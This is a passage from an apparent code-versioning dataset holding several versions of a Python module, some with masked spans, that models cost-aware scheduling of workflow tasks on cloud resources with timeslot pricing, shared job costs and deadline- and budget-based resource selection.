[x.EFT for x in tasks_in_resource]\n if start_time != -1:\n startof.append(start_time)\n endof.append(eft)\n startof.sort()\n endof.sort()\n timeslot_start = min(startof)\n last_finish_time = max(endof)\n current_task_id = 0\n rent_periods = []\n while timeslot_start < last_finish_time:\n task_len = endof[current_task_id] - timeslot_start\n time_slot_finish = endof[current_task_id] + (timeslot - \n task_len % timeslot) % timeslot\n current_task_id += 1\n if current_task_id >= len(startof):\n rent_periods.append((timeslot_start, time_slot_finish))\n break\n if startof[current_task_id] <= time_slot_finish:\n pass\n else:\n rent_periods.append((timeslot_start, time_slot_finish))\n timeslot_start = startof[current_task_id]\n sum = 0\n for rp in rent_periods:\n sum += rp[1] - rp[0]\n cost = sum / timeslot * self.price[resource_id]\n if cost_only:\n return cost\n else:\n return cost, min(startof), max(endof)\n\n def resource_start_time(self, resource_id):\n tasks_in_resource = self.tasksOfResource[resource_id]\n length = len(tasks_in_resource)\n start_index = 0\n while length > 0 and tasks_in_resource[start_index].task.dummy_task:\n start_index += 1\n length -= 1\n if length == 0:\n return -1\n return tasks_in_resource[start_index].EST\n\n @property\n def plan_cost(self):\n cost = 0\n for i in range(0, self.len):\n cost += self.resource_cost(i)\n return cost\n\n def calculate_shared_cost_within_timeslot(self, timeslot_start, est, ft,\n resource_id, task_id=None):\n timeslot_end = timeslot_start + self.timeslot[resource_id]\n if ft <= timeslot_start or est >= timeslot_end:\n return 0\n tasks = 
self.tasksOfResource[resource_id]\n task_ids = self.task_id_in_timeslot(resource_id, timeslot_start)\n sum_w = 0\n for id in task_ids:\n if task_id == id:\n continue\n start_time = tasks[id].EST\n finish_time = tasks[id].EFT\n if start_time < timeslot_start:\n start_time = timeslot_start\n if finish_time > timeslot_end:\n finish_time = timeslot_end\n sum_w += finish_time - start_time\n if est < timeslot_start:\n est = timeslot_start\n if ft > timeslot_end:\n ft = timeslot_end\n if ft == est:\n return 0\n share = float(ft - est) / (sum_w + ft - est)\n return share * self.price[resource_id]\n\n def task_id_in_timeslot(self, resource_id, timeslot_start):\n timeslot_end = timeslot_start + self.timeslot[resource_id]\n task_ids = []\n for id in range(len(self.tasksOfResource[resource_id])):\n s = self.tasksOfResource[resource_id][id]\n if (timeslot_start <= s.EST <= timeslot_end or timeslot_start <=\n s.EFT <= timeslot_end or s.EST < timeslot_start and \n timeslot_end < s.EFT):\n task_ids.append(id)\n return task_ids\n\n def calculate_task_shared_cost(self, est=-1, ft=-1, resource_id=-1,\n task_id=None):\n if task_id is not None:\n est = self.tasksOfResource[resource_id][task_id].EST\n ft = self.tasksOfResource[resource_id][task_id].EFT\n timeslot_len = self.timeslot[resource_id]\n resource_start_time = self.resource_start_time(resource_id)\n if resource_start_time == -1:\n resource_start_time = est\n timeslot_start = float(timeslot_len) * math.floor((est -\n resource_start_time) / timeslot_len) + resource_start_time\n timeslot_end = float(timeslot_len) * math.ceil((ft -\n resource_start_time) / timeslot_len) + resource_start_time\n shared_cost = 0\n for interval in f_range(timeslot_start, timeslot_end + timeslot_len /\n 2, timeslot_len):\n share_in_interval = self.calculate_shared_cost_within_timeslot(\n interval, est, ft, resource_id, task_id)\n shared_cost += share_in_interval\n return shared_cost\n\n def calculate_eft_and_cost(self, task, resource_id, arrival_time=0):\n \"\"\"\n calculates eft and cost of a certain task on a certain resource.\n :param task:Definitions.Task()\n :param resource_id:\n :return:\n \"\"\"\n start_time, eft, runtime_on_resource, place_id = self.calculate_eft(\n task, resource_id, arrival_time=arrival_time)\n if task.dummy_task:\n return start_time, eft, runtime_on_resource, place_id, 0\n else:\n cost = self.calculate_share_cost_change(resource_id, start_time,\n eft, task.graph.name, True)\n return start_time, eft, runtime_on_resource, place_id, cost\n\n def sum_external_gaps_resource(self, r):\n c, s, e = self.resource_cost(r, cost_only=False)\n reservation = e - s\n timeslot = self.timeslot[r]\n gap = timeslot - reservation % timeslot\n if gap == timeslot:\n return 0\n else:\n return gap\n\n @property\n def sum_external_gaps(self):\n sum_gaps = 0\n for r in range(0, self.len):\n sum_gaps += self.sum_external_gaps_resource(r)\n return sum_gaps\n\n @property\n def sum_gaps(self):\n return self.sum_internal_gaps + self.sum_external_gaps\n\n @property\n def occupied_resources(self):\n counter = 0\n for i in range(self.len):\n if self.resource_cost(i) != 0:\n counter += self.price[i]\n return counter\n\n @property\n def gap_rate(self):\n return self.sum_gaps / self.makespan / self.occupied_resources\n\n def select_resource(self, task=Task(), test=None, arrival_time=0):\n eft_best = -1\n\n def something_found():\n return eft_best != -1\n if task.asap is not None:\n if not task.asap:\n if not test:\n print('', end='')\n (est_best, eft_best, runtime_on_resource_best,\n 
place_id_best, resource_id_best, cost_best\n ) = -1, -1, -1, -1, -1, -1\n for r in range(0, self.len):\n (start_time, eft, runtime_on_resource, place_id, cost) = (\n self.calculate_eft_and_cost(task, r, arrival_time=\n arrival_time))\n if (not something_found() or eft < eft_best and task.\n sub_deadline < eft_best or task.sub_budget <\n cost_best and eft <= task.sub_deadline and cost <\n cost_best or eft <= task.sub_deadline and cost <=\n task.sub_budget and (eft_best > task.sub_deadline or\n cost_best > task.sub_budget) or eft <= task.\n sub_deadline and cost <= task.sub_budget and eft <\n eft_best or eft <= task.sub_deadline and cost <=\n task.sub_budget and eft == eft_best and cost <\n cost_best):\n (est_best, eft_best, runtime_on_resource_best,\n place_id_best, resource_id_best, cost_best) = (\n start_time, eft, runtime_on_resource, place_id,\n r, cost)\n continue\n if not test:\n print('', end='')\n return (est_best, runtime_on_resource_best, eft_best,\n resource_id_best, place_id_best, cost_best)\n elif task.asap:\n if not test:\n print('', end='')\n (est_best, eft_best, runtime_on_resource_best,\n place_id_best, resource_id_best, cost_best\n ) = -1, -1, -1, -1, -1, -1\n for r in range(0, self.len):\n (start_time, eft, runtime_on_resource, place_id, cost) = (\n self.calculate_eft_and_cost(task, r, arrival_time=\n arrival_time))\n if (not something_found() or eft < eft_best and task.\n sub_deadline < eft_best or task.sub_budget <\n cost_best and eft <= task.sub_deadline and cost <\n cost_best or eft <= task.sub_deadline and cost <=\n task.sub_budget and (eft_best > task.sub_deadline or\n cost_best > task.sub_budget) or eft <= task.\n sub_deadline and cost <= task.sub_budget and cost <\n cost_best or eft <= task.sub_deadline and cost <=\n task.sub_budget and cost == cost_best and eft <\n eft_best):\n (est_best, eft_best, runtime_on_resource_best,\n place_id_best, resource_id_best, cost_best) = (\n start_time, eft, runtime_on_resource, place_id,\n r, cost)\n continue\n if not test:\n print('', end='')\n return (est_best, runtime_on_resource_best, eft_best,\n resource_id_best, place_id_best, cost_best)\n else:\n return super(CostAwareResources, self).select_resource(task)\n\n def price_of_each_graph(self):\n graph_names = self.job_task_schedule.keys()\n costs = {}\n for name in graph_names:\n costs[name] = 0\n for r in range(self.len):\n for id in range(len(self.tasksOfResource[r])):\n name = self.tasksOfResource[r][id].task.graph.name\n cost = self.calculate_task_shared_cost(resource_id=r,\n task_id=id)\n costs[name] += cost\n return costs\n\n def get_cheapest_empty_resource(self):\n for r in range(self.len):\n if len(self.tasksOfResource[r]) == 0:\n return r\n else:\n return -1\n\n def schedule(self, task_schedule, place_id=-1, do_head_nodes=False):\n super(CostAwareResources, self).schedule(task_schedule, place_id)\n if not do_head_nodes:\n return\n if task_schedule.task.graph.name in self.head_nodes:\n prev_heads = self.head_nodes[task_schedule.task.graph.name]\n parents_of_current_task = task_schedule.task.predecessor.keys()\n self.head_nodes[task_schedule.task.graph.name] = self.head_nodes[\n task_schedule.task.graph.name].difference(\n parents_of_current_task)\n self.head_nodes[task_schedule.task.graph.name].add(task_schedule\n .task.id)\n else:\n self.head_nodes[task_schedule.task.graph.name] = set()\n self.head_nodes[task_schedule.task.graph.name].add(task_schedule\n .task.id)\n self.sum_weight_scheduled[task_schedule.task.graph.name] = 0\n 
self.sum_weight_scheduled[task_schedule.task.graph.name\n ] += task_schedule.task.weight\n\n def calculate_share_cost_change(self, resource_id, est=-1, eft=-1,\n job_id=-1, only_this_job=False):\n sum_w = {}\n for i in range(len(self.tasksOfResource[resource_id])):\n sch = self.tasksOfResource[resource_id][i]\n job = sch.task.graph.name\n if job not in sum_w:\n sum_w[job] = 0\n sum_w[job] += sch.EFT - sch.EST\n sum_w_all_old = sum(sum_w.values())\n prev_cost_resource = self.resource_cost(resource_id)\n prev_cost_job = {}\n for j in sum_w.keys():\n if sum_w_all_old == 0:\n prev_cost_job[j] = 0\n else:\n prev_cost_job[j] = float(prev_cost_resource) * sum_w[j\n ] / sum_w_all_old\n if est == -1:\n return prev_cost_job\n new_cost_resource = self.resource_cost(resource_id, start_time=est,\n eft=eft)\n if job_id not in sum_w:\n sum_w[job_id] = 0\n sum_w[job_id] += eft - est\n sum_w_all_new = sum_w_all_old + eft - est\n new_cost_job = {}\n changes = {}\n for j in sum_w.keys():\n if sum_w_all_new == 0:\n new_cost_job[j] = 0\n else:\n new_cost_job[j] = float(new_cost_resource) * sum_w[j\n ] / sum_w_all_new\n if j not in prev_cost_job:\n changes[j] = new_cost_job[j]\n else:\n changes[j] = new_cost_job[j] - prev_cost_job[j]\n if only_this_job:\n return changes[job_id]\n return changes\n",
"step-2": "<mask token>\n\n\nclass Resources(object):\n <mask token>\n <mask token>\n\n def __init__(self, powers, bandwidth):\n number_of_resources = len(powers)\n self.power = powers\n self.tasksOfResource = []\n for i in range(number_of_resources):\n self.tasksOfResource.append([])\n self.len = number_of_resources\n self.bandwidth = bandwidth\n self.job_task_schedule = {}\n <mask token>\n\n def calculate_eft(self, task, resource_id, arrival_time=0):\n g = task.graph\n if resource_id == -1:\n graphs_task_on_resource = []\n task_runtime_on_resource = task.weight / max(self.power)\n else:\n task_runtime_on_resource = task.weight / self.power[resource_id]\n graphs_task_on_resource = list(map(lambda t: t.task.id if t.\n task.graph.name == g.name else -1, self.tasksOfResource[\n resource_id]))\n max_est_of_task = arrival_time\n for p in task.predecessor:\n if p in graphs_task_on_resource:\n communication_delay = 0\n else:\n communication_delay = task.predecessor[p] / self.bandwidth\n if (g.name not in self.job_task_schedule or p not in self.\n job_task_schedule[g.name]):\n continue\n p_eft = self.job_task_schedule[g.name][p].EFT\n if p_eft + communication_delay > max_est_of_task:\n max_est_of_task = p_eft + communication_delay\n start_time, place_id = self.find_gap(resource_id, max_est_of_task,\n task_runtime_on_resource)\n eft_task = start_time + task_runtime_on_resource\n return start_time, eft_task, task_runtime_on_resource, place_id\n <mask token>\n\n def show_schedule(self, job_id=-1, finishing=None, print_enabled=False):\n result = []\n for r in range(0, self.len):\n names = []\n est = []\n eft = []\n\n def add_entries(x):\n if job_id != -1 and x.task.graph.name != job_id:\n return\n names.append(x.task.id if job_id != -1 else\n f'{x.task.graph.name}-{x.task.id}')\n est.append(x.EST)\n eft.append(x.EFT)\n list(map(add_entries, self.tasksOfResource[r]))\n result.append((names, est, eft))\n\n def print_list(x):\n if not print_enabled:\n return\n first = True\n for e in x:\n if first:\n first = False\n else:\n print(',', end=' ')\n print(e, end=' ')\n print()\n print_list(names)\n print_list(est)\n print_list(eft)\n if finishing is not None and print_enabled:\n print(finishing)\n return result\n <mask token>\n\n @property\n def average_power(self):\n return math.fsum(self.power) / self.len\n\n @property\n def makespan(self):\n eft = 0\n for i in range(0, self.len):\n tasks_in_resource = self.tasksOfResource[i]\n if len(tasks_in_resource) == 0:\n continue\n eft = max(eft, tasks_in_resource[-1].EFT)\n return eft\n <mask token>\n\n @property\n def sum_internal_gaps(self):\n sum_gaps = 0\n for r in range(0, self.len):\n sum_gaps += self.sum_gaps_resource(r)\n return sum_gaps\n\n def select_resource(self, task, arrival_time=0):\n (est_best, eft_best, runtime_on_resource_best, place_id_best,\n resource_id_best) = -1, -1, -1, -1, -1\n for r in range(0, self.len):\n (max_est_of_task, eft_task, task_runtime_on_resource, place_id\n ) = self.calculate_eft(task, r, arrival_time=arrival_time)\n if eft_best == -1 or eft_task < eft_best:\n (est_best, eft_best, runtime_on_resource_best,\n place_id_best, resource_id_best) = (max_est_of_task,\n eft_task, task_runtime_on_resource, place_id, r)\n return (est_best, runtime_on_resource_best, eft_best,\n resource_id_best, place_id_best)\n\n def get_fastest_empty_resource(self):\n for r in range(self.len - 1, -1, -1):\n if len(self.tasksOfResource[r]) == 0:\n return r\n else:\n return -1\n\n\nclass CostAwareResources(Resources):\n\n def __init__(self, powers, 
prices, timeslot_len, bandwidth):\n super(CostAwareResources, self).__init__(powers, bandwidth)\n self.timeslot = timeslot_len\n self.price = prices\n self.head_nodes = {}\n self.sum_weight_scheduled = {}\n\n def resource_cost(self, resource_id, start_time=-1, eft=-1, cost_only=True\n ):\n \"\"\"\n computes a resource's cost. if cost_only==True, only returns cost, otherwise it returns also start and finish-times.\n :param resource_id:\n :param start_time:\n :param eft:\n :param cost_only:\n :return:\n \"\"\"\n tasks_in_resource = [t for t in self.tasksOfResource[resource_id] if\n not t.task.dummy_task]\n if not tasks_in_resource:\n if eft == -1:\n return 0 if cost_only else (0, 0, 0)\n else:\n return math.ceil((eft - start_time) / self.timeslot[\n resource_id]) * self.price[resource_id]\n if start_time != -1:\n task_start_time = min(tasks_in_resource[0].EST, start_time)\n else:\n task_start_time = tasks_in_resource[0].EST\n task_finish_time = max(tasks_in_resource[-1].EFT, eft)\n reservation = task_finish_time - task_start_time\n cost = math.ceil(reservation / self.timeslot[resource_id]\n ) * self.price[resource_id]\n timeslot = self.timeslot[resource_id]\n startof = [x.EST for x in tasks_in_resource]\n endof = [x.EFT for x in tasks_in_resource]\n if start_time != -1:\n startof.append(start_time)\n endof.append(eft)\n startof.sort()\n endof.sort()\n timeslot_start = min(startof)\n last_finish_time = max(endof)\n current_task_id = 0\n rent_periods = []\n while timeslot_start < last_finish_time:\n task_len = endof[current_task_id] - timeslot_start\n time_slot_finish = endof[current_task_id] + (timeslot - \n task_len % timeslot) % timeslot\n current_task_id += 1\n if current_task_id >= len(startof):\n rent_periods.append((timeslot_start, time_slot_finish))\n break\n if startof[current_task_id] <= time_slot_finish:\n pass\n else:\n rent_periods.append((timeslot_start, time_slot_finish))\n timeslot_start = startof[current_task_id]\n sum = 0\n for rp in rent_periods:\n sum += rp[1] - rp[0]\n cost = sum / timeslot * self.price[resource_id]\n if cost_only:\n return cost\n else:\n return cost, min(startof), max(endof)\n\n def resource_start_time(self, resource_id):\n tasks_in_resource = self.tasksOfResource[resource_id]\n length = len(tasks_in_resource)\n start_index = 0\n while length > 0 and tasks_in_resource[start_index].task.dummy_task:\n start_index += 1\n length -= 1\n if length == 0:\n return -1\n return tasks_in_resource[start_index].EST\n\n @property\n def plan_cost(self):\n cost = 0\n for i in range(0, self.len):\n cost += self.resource_cost(i)\n return cost\n\n def calculate_shared_cost_within_timeslot(self, timeslot_start, est, ft,\n resource_id, task_id=None):\n timeslot_end = timeslot_start + self.timeslot[resource_id]\n if ft <= timeslot_start or est >= timeslot_end:\n return 0\n tasks = self.tasksOfResource[resource_id]\n task_ids = self.task_id_in_timeslot(resource_id, timeslot_start)\n sum_w = 0\n for id in task_ids:\n if task_id == id:\n continue\n start_time = tasks[id].EST\n finish_time = tasks[id].EFT\n if start_time < timeslot_start:\n start_time = timeslot_start\n if finish_time > timeslot_end:\n finish_time = timeslot_end\n sum_w += finish_time - start_time\n if est < timeslot_start:\n est = timeslot_start\n if ft > timeslot_end:\n ft = timeslot_end\n if ft == est:\n return 0\n share = float(ft - est) / (sum_w + ft - est)\n return share * self.price[resource_id]\n\n def task_id_in_timeslot(self, resource_id, timeslot_start):\n timeslot_end = timeslot_start + 
self.timeslot[resource_id]\n task_ids = []\n for id in range(len(self.tasksOfResource[resource_id])):\n s = self.tasksOfResource[resource_id][id]\n if (timeslot_start <= s.EST <= timeslot_end or timeslot_start <=\n s.EFT <= timeslot_end or s.EST < timeslot_start and \n timeslot_end < s.EFT):\n task_ids.append(id)\n return task_ids\n\n def calculate_task_shared_cost(self, est=-1, ft=-1, resource_id=-1,\n task_id=None):\n if task_id is not None:\n est = self.tasksOfResource[resource_id][task_id].EST\n ft = self.tasksOfResource[resource_id][task_id].EFT\n timeslot_len = self.timeslot[resource_id]\n resource_start_time = self.resource_start_time(resource_id)\n if resource_start_time == -1:\n resource_start_time = est\n timeslot_start = float(timeslot_len) * math.floor((est -\n resource_start_time) / timeslot_len) + resource_start_time\n timeslot_end = float(timeslot_len) * math.ceil((ft -\n resource_start_time) / timeslot_len) + resource_start_time\n shared_cost = 0\n for interval in f_range(timeslot_start, timeslot_end + timeslot_len /\n 2, timeslot_len):\n share_in_interval = self.calculate_shared_cost_within_timeslot(\n interval, est, ft, resource_id, task_id)\n shared_cost += share_in_interval\n return shared_cost\n\n def calculate_eft_and_cost(self, task, resource_id, arrival_time=0):\n \"\"\"\n calculates eft and cost of a certain task on a certain resource.\n :param task:Definitions.Task()\n :param resource_id:\n :return:\n \"\"\"\n start_time, eft, runtime_on_resource, place_id = self.calculate_eft(\n task, resource_id, arrival_time=arrival_time)\n if task.dummy_task:\n return start_time, eft, runtime_on_resource, place_id, 0\n else:\n cost = self.calculate_share_cost_change(resource_id, start_time,\n eft, task.graph.name, True)\n return start_time, eft, runtime_on_resource, place_id, cost\n\n def sum_external_gaps_resource(self, r):\n c, s, e = self.resource_cost(r, cost_only=False)\n reservation = e - s\n timeslot = self.timeslot[r]\n gap = timeslot - reservation % timeslot\n if gap == timeslot:\n return 0\n else:\n return gap\n\n @property\n def sum_external_gaps(self):\n sum_gaps = 0\n for r in range(0, self.len):\n sum_gaps += self.sum_external_gaps_resource(r)\n return sum_gaps\n\n @property\n def sum_gaps(self):\n return self.sum_internal_gaps + self.sum_external_gaps\n\n @property\n def occupied_resources(self):\n counter = 0\n for i in range(self.len):\n if self.resource_cost(i) != 0:\n counter += self.price[i]\n return counter\n\n @property\n def gap_rate(self):\n return self.sum_gaps / self.makespan / self.occupied_resources\n\n def select_resource(self, task=Task(), test=None, arrival_time=0):\n eft_best = -1\n\n def something_found():\n return eft_best != -1\n if task.asap is not None:\n if not task.asap:\n if not test:\n print('', end='')\n (est_best, eft_best, runtime_on_resource_best,\n place_id_best, resource_id_best, cost_best\n ) = -1, -1, -1, -1, -1, -1\n for r in range(0, self.len):\n (start_time, eft, runtime_on_resource, place_id, cost) = (\n self.calculate_eft_and_cost(task, r, arrival_time=\n arrival_time))\n if (not something_found() or eft < eft_best and task.\n sub_deadline < eft_best or task.sub_budget <\n cost_best and eft <= task.sub_deadline and cost <\n cost_best or eft <= task.sub_deadline and cost <=\n task.sub_budget and (eft_best > task.sub_deadline or\n cost_best > task.sub_budget) or eft <= task.\n sub_deadline and cost <= task.sub_budget and eft <\n eft_best or eft <= task.sub_deadline and cost <=\n task.sub_budget and eft == eft_best and cost 
<\n cost_best):\n (est_best, eft_best, runtime_on_resource_best,\n place_id_best, resource_id_best, cost_best) = (\n start_time, eft, runtime_on_resource, place_id,\n r, cost)\n continue\n if not test:\n print('', end='')\n return (est_best, runtime_on_resource_best, eft_best,\n resource_id_best, place_id_best, cost_best)\n elif task.asap:\n if not test:\n print('', end='')\n (est_best, eft_best, runtime_on_resource_best,\n place_id_best, resource_id_best, cost_best\n ) = -1, -1, -1, -1, -1, -1\n for r in range(0, self.len):\n (start_time, eft, runtime_on_resource, place_id, cost) = (\n self.calculate_eft_and_cost(task, r, arrival_time=\n arrival_time))\n if (not something_found() or eft < eft_best and task.\n sub_deadline < eft_best or task.sub_budget <\n cost_best and eft <= task.sub_deadline and cost <\n cost_best or eft <= task.sub_deadline and cost <=\n task.sub_budget and (eft_best > task.sub_deadline or\n cost_best > task.sub_budget) or eft <= task.\n sub_deadline and cost <= task.sub_budget and cost <\n cost_best or eft <= task.sub_deadline and cost <=\n task.sub_budget and cost == cost_best and eft <\n eft_best):\n (est_best, eft_best, runtime_on_resource_best,\n place_id_best, resource_id_best, cost_best) = (\n start_time, eft, runtime_on_resource, place_id,\n r, cost)\n continue\n if not test:\n print('', end='')\n return (est_best, runtime_on_resource_best, eft_best,\n resource_id_best, place_id_best, cost_best)\n else:\n return super(CostAwareResources, self).select_resource(task)\n\n def price_of_each_graph(self):\n graph_names = self.job_task_schedule.keys()\n costs = {}\n for name in graph_names:\n costs[name] = 0\n for r in range(self.len):\n for id in range(len(self.tasksOfResource[r])):\n name = self.tasksOfResource[r][id].task.graph.name\n cost = self.calculate_task_shared_cost(resource_id=r,\n task_id=id)\n costs[name] += cost\n return costs\n\n def get_cheapest_empty_resource(self):\n for r in range(self.len):\n if len(self.tasksOfResource[r]) == 0:\n return r\n else:\n return -1\n\n def schedule(self, task_schedule, place_id=-1, do_head_nodes=False):\n super(CostAwareResources, self).schedule(task_schedule, place_id)\n if not do_head_nodes:\n return\n if task_schedule.task.graph.name in self.head_nodes:\n prev_heads = self.head_nodes[task_schedule.task.graph.name]\n parents_of_current_task = task_schedule.task.predecessor.keys()\n self.head_nodes[task_schedule.task.graph.name] = self.head_nodes[\n task_schedule.task.graph.name].difference(\n parents_of_current_task)\n self.head_nodes[task_schedule.task.graph.name].add(task_schedule\n .task.id)\n else:\n self.head_nodes[task_schedule.task.graph.name] = set()\n self.head_nodes[task_schedule.task.graph.name].add(task_schedule\n .task.id)\n self.sum_weight_scheduled[task_schedule.task.graph.name] = 0\n self.sum_weight_scheduled[task_schedule.task.graph.name\n ] += task_schedule.task.weight\n\n def calculate_share_cost_change(self, resource_id, est=-1, eft=-1,\n job_id=-1, only_this_job=False):\n sum_w = {}\n for i in range(len(self.tasksOfResource[resource_id])):\n sch = self.tasksOfResource[resource_id][i]\n job = sch.task.graph.name\n if job not in sum_w:\n sum_w[job] = 0\n sum_w[job] += sch.EFT - sch.EST\n sum_w_all_old = sum(sum_w.values())\n prev_cost_resource = self.resource_cost(resource_id)\n prev_cost_job = {}\n for j in sum_w.keys():\n if sum_w_all_old == 0:\n prev_cost_job[j] = 0\n else:\n prev_cost_job[j] = float(prev_cost_resource) * sum_w[j\n ] / sum_w_all_old\n if est == -1:\n return prev_cost_job\n 
new_cost_resource = self.resource_cost(resource_id, start_time=est,\n eft=eft)\n if job_id not in sum_w:\n sum_w[job_id] = 0\n sum_w[job_id] += eft - est\n sum_w_all_new = sum_w_all_old + eft - est\n new_cost_job = {}\n changes = {}\n for j in sum_w.keys():\n if sum_w_all_new == 0:\n new_cost_job[j] = 0\n else:\n new_cost_job[j] = float(new_cost_resource) * sum_w[j\n ] / sum_w_all_new\n if j not in prev_cost_job:\n changes[j] = new_cost_job[j]\n else:\n changes[j] = new_cost_job[j] - prev_cost_job[j]\n if only_this_job:\n return changes[job_id]\n return changes\n",
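
Editor's note: the step-2 variant above ends with calculate_share_cost_change, which splits a resource's rental cost between jobs in proportion to the time their tasks occupy it and reports the marginal change from tentatively adding one task. Below is a minimal standalone sketch of that idea, not the module itself: the names resource_cost/share_cost_change are illustrative, and billing uses the simpler ceil-of-whole-span rule for brevity (the real resource_cost refines this with rent periods, sketched further down).

import math

def resource_cost(intervals, timeslot, price):
    # Simplified whole-span billing: round the reservation up to whole timeslots.
    if not intervals:
        return 0.0
    start = min(s for s, _ in intervals)
    end = max(e for _, e in intervals)
    return math.ceil((end - start) / timeslot) * price

def share_cost_change(intervals_by_job, new_job, new_interval, timeslot, price):
    # Old shares: resource cost split proportionally to each job's occupied time.
    old_w = {j: sum(e - s for s, e in iv) for j, iv in intervals_by_job.items()}
    all_iv = [iv for ivs in intervals_by_job.values() for iv in ivs]
    old_cost = resource_cost(all_iv, timeslot, price)
    old_total = sum(old_w.values())
    old_share = {j: (old_cost * w / old_total if old_total else 0.0)
                 for j, w in old_w.items()}
    # New shares after tentatively adding the task's interval.
    s, e = new_interval
    new_w = dict(old_w)
    new_w[new_job] = new_w.get(new_job, 0) + (e - s)
    new_cost = resource_cost(all_iv + [new_interval], timeslot, price)
    new_total = sum(new_w.values())
    new_share = new_cost * new_w[new_job] / new_total if new_total else 0.0
    return new_share - old_share.get(new_job, 0.0)

# Job "A" occupies [0, 5); adding job "B"'s task at [5, 8) on a timeslot of
# 10 priced 1.0 gives B a share of 3/8 of the (unchanged) one-timeslot cost.
print(share_cost_change({"A": [(0, 5)]}, "B", (5, 8), 10, 1.0))  # 0.375
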
"step-3": "<mask token>\n\n\nclass Resources(object):\n <mask token>\n <mask token>\n\n def __init__(self, powers, bandwidth):\n number_of_resources = len(powers)\n self.power = powers\n self.tasksOfResource = []\n for i in range(number_of_resources):\n self.tasksOfResource.append([])\n self.len = number_of_resources\n self.bandwidth = bandwidth\n self.job_task_schedule = {}\n\n def find_gap(self, resource, start_time, runtime):\n \"\"\"\n finds a gap in resource and returns the start time and the place index of the task among the current tasks of the resource\n if resource is -1, it does nothing (returns the given start time, and -1 for place)\n \"\"\"\n if resource == -1:\n return start_time, -1\n number_of_tasks = len(self.tasksOfResource[resource])\n if number_of_tasks == 0:\n return start_time, 0\n elif self.tasksOfResource[resource][0].EST >= start_time + runtime:\n return start_time, 0\n elif number_of_tasks == 1:\n if self.tasksOfResource[resource][0].EFT < start_time:\n return start_time, 1\n else:\n return self.tasksOfResource[resource][0].EFT, 1\n else:\n for i in range(1, number_of_tasks):\n if self.tasksOfResource[resource][i].EST <= start_time:\n continue\n elif start_time < self.tasksOfResource[resource][i - 1].EFT:\n gap = self.tasksOfResource[resource][i\n ].EST - self.tasksOfResource[resource][i - 1].EFT\n if gap < runtime:\n continue\n else:\n return self.tasksOfResource[resource][i - 1].EFT, i\n elif self.tasksOfResource[resource][i - 1\n ].EFT <= start_time < self.tasksOfResource[resource][i\n ].EST:\n if self.tasksOfResource[resource][i\n ].EST - start_time < runtime:\n continue\n else:\n return start_time, i\n else:\n return max(self.tasksOfResource[resource][-1].EFT, start_time\n ), -1\n\n def calculate_eft(self, task, resource_id, arrival_time=0):\n g = task.graph\n if resource_id == -1:\n graphs_task_on_resource = []\n task_runtime_on_resource = task.weight / max(self.power)\n else:\n task_runtime_on_resource = task.weight / self.power[resource_id]\n graphs_task_on_resource = list(map(lambda t: t.task.id if t.\n task.graph.name == g.name else -1, self.tasksOfResource[\n resource_id]))\n max_est_of_task = arrival_time\n for p in task.predecessor:\n if p in graphs_task_on_resource:\n communication_delay = 0\n else:\n communication_delay = task.predecessor[p] / self.bandwidth\n if (g.name not in self.job_task_schedule or p not in self.\n job_task_schedule[g.name]):\n continue\n p_eft = self.job_task_schedule[g.name][p].EFT\n if p_eft + communication_delay > max_est_of_task:\n max_est_of_task = p_eft + communication_delay\n start_time, place_id = self.find_gap(resource_id, max_est_of_task,\n task_runtime_on_resource)\n eft_task = start_time + task_runtime_on_resource\n return start_time, eft_task, task_runtime_on_resource, place_id\n\n def schedule(self, task_schedule, place_id=-1):\n \"\"\"\n Schedules a task in a place id. 
if place_id is -1 the schedule is appended to the last.\n :type task_schedule: TaskSchedule\n :type place_id: int\n \"\"\"\n resource = task_schedule.resource\n if place_id == -1:\n self.tasksOfResource[resource].append(task_schedule)\n else:\n self.tasksOfResource[resource].insert(place_id, task_schedule)\n if task_schedule.task.graph.name in self.job_task_schedule:\n pass\n else:\n self.job_task_schedule[task_schedule.task.graph.name] = {}\n self.job_task_schedule[task_schedule.task.graph.name][task_schedule\n .task.id] = task_schedule\n\n def show_schedule(self, job_id=-1, finishing=None, print_enabled=False):\n result = []\n for r in range(0, self.len):\n names = []\n est = []\n eft = []\n\n def add_entries(x):\n if job_id != -1 and x.task.graph.name != job_id:\n return\n names.append(x.task.id if job_id != -1 else\n f'{x.task.graph.name}-{x.task.id}')\n est.append(x.EST)\n eft.append(x.EFT)\n list(map(add_entries, self.tasksOfResource[r]))\n result.append((names, est, eft))\n\n def print_list(x):\n if not print_enabled:\n return\n first = True\n for e in x:\n if first:\n first = False\n else:\n print(',', end=' ')\n print(e, end=' ')\n print()\n print_list(names)\n print_list(est)\n print_list(eft)\n if finishing is not None and print_enabled:\n print(finishing)\n return result\n\n def write_schedule(self, db_file, test_name='N/A', extra='single',\n policy='', job_count=1):\n w = writer.Writer(db_file)\n w.create_plan()\n w.create_plan_head()\n unique_jobs_id = w.write_plan_head(test_name, policy, job_count)\n\n def add_entries(x):\n (job_name, job_type, task_id, jobs_id, start_time, finish_time,\n resource_id, resource_speed, job_component_id, extra_params\n ) = (x.task.graph.name, x.task.graph.type, x.task.id,\n unique_jobs_id, x.EST, x.EFT, r, self.power[r], policy, extra)\n w.write_plan(job_name, job_type, task_id, jobs_id, start_time,\n finish_time, resource_id, resource_speed, job_component_id,\n extra_params)\n for r in range(0, self.len):\n list(map(add_entries, self.tasksOfResource[r]))\n w.commit()\n w.close()\n\n @property\n def average_power(self):\n return math.fsum(self.power) / self.len\n\n @property\n def makespan(self):\n eft = 0\n for i in range(0, self.len):\n tasks_in_resource = self.tasksOfResource[i]\n if len(tasks_in_resource) == 0:\n continue\n eft = max(eft, tasks_in_resource[-1].EFT)\n return eft\n\n def sum_gaps_resource(self, resource_id):\n tasks_in_current_resource = self.tasksOfResource[resource_id]\n num_tasks = len(tasks_in_current_resource)\n if num_tasks <= 1:\n return 0\n sum_gaps = 0\n for i in range(1, num_tasks):\n if tasks_in_current_resource[i - 1\n ].task.dummy_task or tasks_in_current_resource[i\n ].task.dummy_task:\n continue\n finish_prev = tasks_in_current_resource[i - 1].EFT\n start_current = tasks_in_current_resource[i].EST\n gap_length = start_current - finish_prev\n if gap_length < 0:\n raise Exception('Schedule is not correct, check gaps!')\n sum_gaps += gap_length\n return sum_gaps\n\n @property\n def sum_internal_gaps(self):\n sum_gaps = 0\n for r in range(0, self.len):\n sum_gaps += self.sum_gaps_resource(r)\n return sum_gaps\n\n def select_resource(self, task, arrival_time=0):\n (est_best, eft_best, runtime_on_resource_best, place_id_best,\n resource_id_best) = -1, -1, -1, -1, -1\n for r in range(0, self.len):\n (max_est_of_task, eft_task, task_runtime_on_resource, place_id\n ) = self.calculate_eft(task, r, 